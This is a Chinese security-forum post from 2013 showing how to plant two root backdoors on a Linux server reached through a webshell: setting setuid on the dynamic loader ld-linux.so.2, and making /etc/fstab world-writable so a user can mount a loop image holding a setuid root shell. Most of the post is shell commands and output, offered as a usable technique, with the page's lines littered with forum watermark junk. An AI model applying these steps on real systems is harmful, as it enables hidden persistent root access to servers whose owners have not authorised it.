找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3201|回复: 1
打印 上一主题 下一主题

webshell下LINUX提权+留后门

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:56:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
$ `0 m- K/ |% o' t" D
0 [. B. j3 w) O9 }+ h[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
1 |8 G( c: I+ G. K" g) H) t" p8 J6 tlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
- ?3 f, x5 I, u) ?- f& [8 slrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究' R# U- A% f: s2 E- ~6 Q
[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究  ]6 N5 V, D. q* G, G! @
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
: k$ O2 ?1 Z4 x( L# `/ s-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
( Z6 g! d: U. _7 f7 [lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
) ?/ T+ w1 c% E$ x* G, i! p: D[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究4 O! O2 ^3 V" y' X
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究
) P# a4 u! l) m$ G% s  M
( O! D2 @% x3 S/ X+ ~% m5 X普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究* C2 L' w8 h, ?- q- @, s$ ]

9 n+ d' g5 j% I) R# f2 d[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究
- w" Y$ a7 N8 p8 w) z% k" rxiaoyu2ezX-BUG-关注前沿信息安全技术研究
8 m9 P* p0 W" K" v* z[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究: B" z2 h9 k% A
root2ezX-BUG-关注前沿信息安全技术研究9 K0 d) G3 E: z3 o
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
, e( e; }0 A/ \! J恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究
: S8 `4 x/ J# _1 s% c  u7 P8 ~* `! y. c$ v# L/ u' K
方法二:2ezX-BUG-关注前沿信息安全技术研究1 S8 p' ]! L8 E! P( W* K% S

1 X, p6 w: R3 `: w看过程:2ezX-BUG-关注前沿信息安全技术研究( o+ j$ y; b/ A" S% F
: w& w2 E! d& c2 p6 N; \
[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究2 z- s  u* ~3 A! ~* S) x8 S8 X
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究
" j# q2 u( z& b+ G  p8 b0 Y5 t" v
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
4 W6 [$ C+ j- Y: v' e* d  @$ D# v7 N4 K5 f; [3 x
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究2 }7 B: y6 b: v$ k; p8 i6 u
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
* \3 D! X$ Q. o7 N) y0 F3 T6 d. |[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
# M) _* a) \2 _. f. Z4 O* ]- k3 _8 ?! Z% {
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
( f: x) C( o" F# J% D" Q* h- L7 ?% {. }" S7 b0 s% P" H
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
" [2 S, I, G- W( B8 P- B2 f-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究2 D, t  V: _$ s- Z; S  u
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
) h4 _  _- _/ T, n% ~[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究7 h' Y" b( L# |- a% J) s- e# w
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
& r* Y1 j! E& G2 P! Q8 a7 ototal 182ezX-BUG-关注前沿信息安全技术研究# G5 @. B( N1 o: k' q' ^
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究+ G: |4 S  F4 z' B. z
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究9 i/ i! P6 w2 W9 C# p1 s& Q
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究5 T* q7 W2 B/ J, c2 r
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究
6 l7 B2 h( o4 x! _看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究6 i0 M$ t' d' C$ y- ]5 N
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
5 Z( N5 X* s  M! y# A0 d9 B5 o7 x* D- r( R
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究& r7 [% P- H  D* j9 g. W2 [# L
2ezX-BUG-关注前沿信息安全技术研究5 X4 U2 ^, v' s1 `
+ q' P6 m, T7 i" N
回复

使用道具 举报

沙发
发表于 2013-3-13 15:10:29 | 只看该作者
谢谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表